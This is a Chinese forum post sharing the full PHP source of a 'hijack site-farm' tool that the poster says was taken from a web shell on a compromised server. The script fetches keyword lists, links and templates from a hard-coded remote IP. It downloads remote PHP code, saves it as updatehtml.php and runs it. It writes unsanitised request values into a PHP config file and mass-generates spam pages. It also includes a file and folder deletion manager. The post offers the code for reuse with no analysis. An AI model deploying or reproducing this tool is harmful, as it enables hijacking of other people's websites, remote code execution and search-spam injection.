泛站群代码

admin · 发表于 2014-8-10 22:11:18

从某SHELL上看到的，分享下

?<?php ob_end_flush();set_time_limit(0);?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>提莫劫持泛站版 Version 2013</title>
<style type="text/css">p {float:left;width:25%;height:22px;font-size:12px;margin:0px;}</style>
<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.4.min.js"></script>
</head>
<body>
<?php
$act = 'default'; if (isset($_REQUEST['act'])) $act = trim($_REQUEST['act']);
//保存文件
function Save($file, $body,$tcode){
//if(strtolower($tcode) != 'gb2312') $body = iconv('gb2312',$tcode,$body);
$obj=fopen($file,'w');
fwrite($obj, $body);
fclose($obj);
}
//获取当前文件名
function GetName(){
$url = $_SERVER['PHP_SELF'];
$arr = explode('/' , $url );
$filename= $arr[count($arr)-1];
return $filename;
}
//删除文件夹
function DelDir($dir){
//先删除目录下的文件：
$dh=opendir($dir);
while ($file=readdir($dh)) {
if($file!="." && $file!="..") {
$fullpath=$dir."/".$file;
if(!is_dir($fullpath)) {
unlink($fullpath);
} else {
deldir($fullpath);
}
}
}
closedir($dh);
echo '<h5 style="margin:5px 0px;font-size:14px;text-align:center;">文件夹 '. $dir .' 删除成功！</h5>';
//删除当前文件夹：
if(rmdir($dir)) {
return true;
} else {
return false;
}
}
//删除文件
function DelFile($path){
if (strlen($path)>0){
if(file_exists($path)){
unlink($path);
echo '<h5 style="margin:5px 0px;font-size:14px;text-align:center;">文件 '. $path .' 删除成功！</h5>';
}else{
echo '<h5 style="margin:5px 0px;font-size:14px;text-align:center;">文件 '. $path .' 不存在！</h5>';
}
}
}
//获取文件目录列表,该方法返回数组
function getDir($dir) {
$bak='';$i=0;
if (false != ($handle = opendir ( $dir ))) {
while ( false !== ($file = readdir ( $handle )) ) {
//去掉"“.”、“..”以及带“.xxx”后缀的文件
if ($file != "." && $file != ".."&&!strpos($file, ".")) {
$bak.='<option value="'. $file .'">'. $file .'</option>';
$i++;
}
}
closedir ($handle );
}
return $bak;
}
//获取文件列表
function getFile($dir) {
$bak='';
if (false != ($handle = opendir ( $dir ))) {
$i=0;
while ( false !== ($file = readdir ( $handle )) ) {
//去掉"“.”、“..”以及带“.xxx”后缀的文件
if ($file != "." && $file != ".."&&strpos($file,".")) {
$bak.='<option value="'. $file .'">'. $file .'</option>';
if($i==500) break;
$i++;
}
}
closedir ( $handle );
}
return $bak;
}
if ($act=="delfile"){
//文件管理工具部份
$act2='timo'; if (isset($_REQUEST["act2"])) $act2=trim($_REQUEST["act2"]);
$sysPath="./"; if (isset($_REQUEST["syspath"])) $sysPath=trim($_REQUEST["syspath"]);
if ($act2 == "df") {
if (isset($_POST["file_list"])>0){
$Arrs=$_POST["file_list"];
foreach ($Arrs as $val){
DelFile($sysPath . trim($val));
}
echo '<h2 style="margin-top:200px;font-size:22px;text-align:center;">删除成功，请<a href="?act='. $act .'&syspath='. $sysPath .'" style="font-size:22px;">点击这里返回</a>!</h2>';
}else{
echo '<h2 style="margin-top:200px;font-size:22px;text-align:center;">别乱点了，你什么也没有选择呀!</h2>';
}
echo '<meta http-equiv="refresh" content="1;URL=?act='. $act .'&syspath='. $sysPath .'" />';
} elseif ($act2 == "dd") {
if (isset($_POST["dir_list"])>0){
$Arrs=$_POST["dir_list"];
foreach ($Arrs as $val){
DelDir($sysPath . trim($val));
}
echo '<h2 style="margin:0px;font-size:22px;text-align:center;">删除成功，请<a href="?act='. $act .'&syspath='. $sysPath .'" style="font-size:22px;">点击这里返回</a>!</h2>';
}else{
echo '<h2 style="margin-top:200px;font-size:22px;text-align:center;">别乱点了，你什么也没有选择呀!</h2>';
}
echo '<meta http-equiv="refresh" content="1;URL=?act='. $act .'&syspath='. $sysPath .'" />';
} elseif ($act2 == "backup") {
$Arrs = explode("/", $sysPath);
$sysPath="";
for($i=0; $i < (count($Arrs)-2); $i++){
$sysPath .= trim($Arrs[$i]) . "/";
}
echo '<script type="text/javascript">window.location.href="?act='. $act .'&syspath='. $sysPath .'";</script>';
}else{
?>
<table border="0" align="center" cellpadding="20" cellspacing="0">
<tr>
<td colspan="2" style="background:#eee;">
<form id="form3" name="form3" method="post" action="?act=<?php echo $act;?>&act2=go">请选择目录:
<input type="text" name="syspath" value="<?php echo $sysPath; ?>" style="width:650px;cursor:pointer;" />
<input type="submit" name="Submit" value="进入" /><input type="button" name="Submit2" value="上级" onclick="window.location.href='?act=<?php echo $act;?>&act2=backup&syspath=<?php echo $sysPath; ?>';" style="cursor:pointer;" />
</form>
</td>
</tr>
<tr>
<td style="background:#ffdcaf;">
<form id="form1" name="form1" method="post" action="?act=<?php echo $act;?>&act2=dd&syspath=<?php echo $sysPath; ?>">
文件夹列表:<br />
<select name="dir_list[]" ondblclick="window.location.href='?act=<?php echo $act;?>&syspath=<?php echo $sysPath; ?>' + $(this).val() +'/';" size="20" style="width:400px;" multiple="multiple" title="双击可进入目录">
<?php echo getDir($sysPath); ?>
</select><br />
<input type="submit" name="Submit3" value="删除所选" style="width:280px;height:40px;color:#c00;margin-top:8px;font-size:16px;font-weight:bold;cursor:pointer;" /><input type="button" name="Submit13" value="返回生成" onclick="location.href = '?act=default';" style="width:120px;height:40px;margin-top:8px;font-size:14px;cursor:pointer;margin-left:-1px;" />
</form> </td>
<td style="background:#93cbff;">
<form id="form2" name="form2" method="post" action="?act=<?php echo $act;?>&act2=df&syspath=<?php echo $sysPath; ?>">
文件列表:<br />
<select name="file_list[]" size="20" style="width:400px;" multiple="multiple">
<?php echo getFile($sysPath); ?>
</select><br />
<input type="submit" name="Submit4" value="删除所选" style="width:280px;height:40px;color:#c00;margin-top:8px;font-size:16px;font-weight:bold;cursor:pointer;" /><input type="button" name="Submit14" value="返回生成" onclick="location.href = '?act=default';" style="width:120px;height:40px;margin-top:8px;font-size:14px;cursor:pointer;margin-left:-1px;" />
</form> </td>
</tr>
</table>
<?php
}
}elseif ($act=="mb_list" || $act=="links_list" || $act=="keys_list"){
//获取列表模式
$vs = ''; if (isset($_REQUEST['vs'])) $vs = trim($_REQUEST['vs']);
$tcode = ''; if (isset($_REQUEST['tcode'])) $tcode = trim($_REQUEST['tcode']);
if ($act == "mb_list") {
$data = file_get_contents($vs ."?act=". $act ."&tcode=".$tcode."&coded=utf8");
$data = str_replace('?', '', $data);
echo "<script>parent.GetMB_list('". trim($data) ."');</script>";
}
if ($act == "links_list") {
$data = file_get_contents($vs ."?act=". $act ."&tcode=".$tcode);
$data = str_replace('?', '', $data);
echo "<script>parent.GetLink_list('". trim($data) ."');</script>";
}
if ($act == "keys_list") {
$data = file_get_contents($vs ."?act=". $act ."&tcode=".$tcode);
$data = str_replace('?', '', $data);
echo "<script>parent.GetKeys_list('". trim($data) ."');</script>";
}
}else{
$act_ing=''; if (isset($_REQUEST['ing'])) $act_ing=trim($_REQUEST["ing"]);
if($act_ing=='timo'){//更新配置文件
$data = '<?php'."\r\n".
'define("DB_service","'.$_REQUEST['service'].'");'."\r\n".
'define("DB_mb","'.$_REQUEST['mb'].'");'."\r\n".
'define("DB_links","'.$_REQUEST['links'].'");'."\r\n".
'define("DB_keys","'.$_REQUEST['keys'].'");'."\r\n".
'define("DB_maxnum",'.$_REQUEST['maxnum'].');'."\r\n".
'define("DB_pagenum",'.$_REQUEST['pagenum'].');'."\r\n".
'define("DB_listnum",'.$_REQUEST['listnum'].');'."\r\n".
'define("DB_catalog","'.$_REQUEST['catalog'].'");'."\r\n".
'define("DB_names","'.$_REQUEST['names'].'");'."\r\n".
'define("DB_ext","'.$_REQUEST['ext'].'");'."\r\n".
'define("DB_types","'.$_REQUEST['types'].'");'."\r\n".
'define("DB_delor",'.$_REQUEST['delor'].');'."\r\n".
'define("tcode","'.$_REQUEST['targetcode'].'");'."\r\n".
'define("addnum",'.$_REQUEST['addnum'].');'."\r\n".
'define("basenum",'.$_REQUEST['basenum'].');'."\r\n".
'define("listprefix","'.$_REQUEST['listprefix'].'");'."\r\n".
'?>';
Save('timoConfig.php', $data,$_REQUEST['targetcode']);
echo "开始下载服务器数据[1]...<script>setTimeout(function(){window.location.href='?ing=keys';},100)</script>";return false;
}elseif($act_ing=='keys'){
//下载关键词内容
include_once('timoConfig.php');
$data = file_get_contents(DB_service ."?act=savekey&file=".trim(DB_keys)."&tcode=".tcode."&t=". rand(0, 9999));
$data = str_replace('|***timo***|', "\r\n", $data);
Save('timokey.txt', $data,tcode);
$data = file_get_contents(DB_service ."?act=randkey&lenth=6&tcode=".tcode."&names=".DB_names."&MaxNum=".DB_maxnum ."&addnum=".addnum."&basenum=".basenum."&t=". rand(0, 9999));
$data = str_replace('|', "\r\n", $data);
Save('timourl.txt', $data,tcode);
echo "开始下载服务器数据[2]...<script>setTimeout(function(){window.location.href='?ing=links';}, 100)</script>";return false;
}elseif($act_ing=='links'){
//下载外链内容
include_once('timoConfig.php');
$data = file_get_contents(DB_service ."?act=savelink&file=". trim(DB_links) ."&tcode=".tcode."&t=". rand(0, 9999));
$data = str_replace('|***timo***|', "\r\n", $data);
Save('timolink.txt', $data,tcode);
echo "开始下载服务器数据[3]...<script>setTimeout(function(){window.location.href='?ing=moban';}, 100)</script>";return false;
}elseif($act_ing=='moban'){
//下载模板
include_once('timoConfig.php');
$data = file_get_contents(DB_service ."?act=moban_list&templets=". trim(DB_mb) ."&tcode=".tcode."&t=". rand(0, 9999));
Save('moban_list.txt',$data,tcode);
$data = file_get_contents(DB_service ."?act=moban_page&templets=". trim(DB_mb) ."&tcode=".tcode."&t=". rand(0, 9999));
Save('moban_page.txt',$data,tcode);
$data = file_get_contents(DB_service ."?act=subject&lang=php&tcode=".tcode."&t=". rand(0, 9999));
Save("updatehtml.php",$data,tcode);
echo "数据下载完成，准备生成文件...<script>setTimeout(function(){window.location.href='updatehtml.php?act=page';}, 500)</script>";return false;
}else{
?>
<script type="text/javascript">
function GetMB(key){GetMB_obj.location.href="?act="+ key +"&vs="+ (document.form1.service.value) + "&tcode=" + (document.form1.targetcode.value);}
function GetMB_list(str){
var Obj = document.form1.mb;
Obj.options.length=0;
var Arrs=str.split(",");
for (i=0;i<Arrs.length ;i++ ){
Obj.options.add(new Option(Arrs[i],Arrs[i]));
}
}
function GetLS(key){GetLink_obj.location.href="?act="+ key +"&vs="+ (document.form1.service.value) + "&tcode=" + (document.form1.targetcode.value);}
function GetLink_list(str){
var Obj = document.form1.links;
Obj.options.length=0;
var Arrs=str.split(",");
for (i=0;i<Arrs.length ;i++ ){
Obj.options.add(new Option(Arrs[i],Arrs[i]));
}
}
function GetKS(key){GetKey_obj.location.href="?act="+ key +"&vs="+ (document.form1.service.value) + "&tcode=" + (document.form1.targetcode.value);}
function GetKeys_list(str){
var Obj = document.form1.keys;Obj.options.length=0;var Arrs=str.split(",");
for (i=0;i<Arrs.length ;i++ ){
Obj.options.add(new Option(Arrs[i],Arrs[i]));
}
}
window.onload = function(){GetMB('mb_list');GetLS('links_list');GetKS('keys_list');}
</script>
<div style="display:none;"><iframe id="GetMB_obj" name="GetMB_obj"></iframe><iframe id="GetLink_obj" name="GetLink_obj"></iframe><iframe id="GetKey_obj" name="GetKey_obj"></iframe></div>
<div style="width:420px;margin:auto;border:8px #e8e8e8 solid;background:#f6f6f6;margin-top:30px;padding:25px 80px 20px;">
<h2>提莫劫持泛站版 Version 2013</h2>
<form name="form1" method="get" action="" style="font-size:14px;">
<input name="ing" type="hidden" id="ing" value="timo" />
文件目标编码：
<select id="targetcode" name="targetcode" style="width:80px;">
<option value="GB2312">GB2312</option>
<option value="UTF-8">UTF-8</option>
</select><br/><br />
服务器地址：<input id="service" name="service" type="text" size="40" value="http://202.55.12.163:86/API/" /><br /><br />
调用的模板：<select id="mb" name="mb" style="width:200px;"><option>请先获取模板列表...</option></select> <input type="button" onclick="javascript:GetMB('mb_list');" value="获取模板" style="width:80px;height:25px;cursor:pointer;" /><br /><br />
调用的外链：<select id="links" name="links" style="width:200px;"><option>请先获取外链列表...</option></select> <input type="button" onclick="javascript:GetLS('links_list');" value="获取外链" style="width:80px;height:25px;cursor:pointer;" /><br /><br />
调用关键词：<select id="keys" name="keys" style="width:200px;"><option>请先获取关键词列表...</option></select> <input type="button" onclick="javascript:GetKS('keys_list');" value="获取关键词" style="width:80px;height:25px;cursor:pointer;" /><br /><br />
存放文件夹：<input name="catalog" type="text" id="ext" value="./news/" size="18" title="./本地址 ../上级目录" />  生成：<input name="maxnum" type="text" id="maxnum" value="800" size="5" style="text-align:center;" />页<br /><br />
每页更新量：<input name="pagenum" type="text" id="pagenum" value="100" size="5" style="text-align:center;" /> 条   列表页：<input name="listnum" type="text" id="listnum" value="100" size="5" style="text-align:center;" />条文章/页<br /><br />
生成文件格式：<select id="names" name="names" style="width:100px;">
<option value="en_num">英文&数字</option>
<option value="en">随机英文</option>
<option value="num">随机数字</option>
<option value="addnum">递增数字</option>
</select><select id="ext" name="ext" style="width:60px;">
<option value=".html">.html</option>
<option value=".htm">.htm</option>
<option value=".php">.php</option>
<option value=".asp">.asp</option>
<option value=".aspx">.aspx</option>
</select><br /><br />
递增基数：<input type="text" style="text-align:center;width:70px" value="1000" id="basenum" name="basenum">
每次递增：<input type="text" style="text-align:center;width:70px" value="1" id="addnum" name="addnum">
<br /><br />
列表页前缀名称：<input type="text" style="text-align:center;width:70px" value="index" id="listprefix" name="listprefix">
<br /><br />
选择生成版本：<label title="生成例如：Ys8vp2.html"><input type="radio" name="types" value="pages" checked="checked" />页面版</label> <label title="生成例如：Ys8vp2/index.html"><input name="types" type="radio" value="catalog" />目录版</label><br /><br />
完成删除临时数据：<label title="完成后删除程序文件" style="color:red;"><input name="delor" type="radio" value="1" checked="checked" />删除掉</label> <label title="不删除程序文件"><input type="radio" name="delor" value="0" />不删除</label><br /><br />
<center><input type="submit" name="button" id="button" value="猛戳这里吧" style="width:180px;height:30px;cursor:pointer;font-size:16px;font-weight:bold;" /><input type="button" name="button2" value="文件管理工具" onclick="location.href = '?act=delfile';" style="width:140px;height:30px;cursor:pointer;font-size:14px;margin-left:-1px;" /></center>
</form><br />
<div style="font-size:12px;text-align:center;color:#999;">CopyRight 2013-12-14 提莫队长前去探路</div>
</div>
<?php }
} ?>
</body>
</html>

复制代码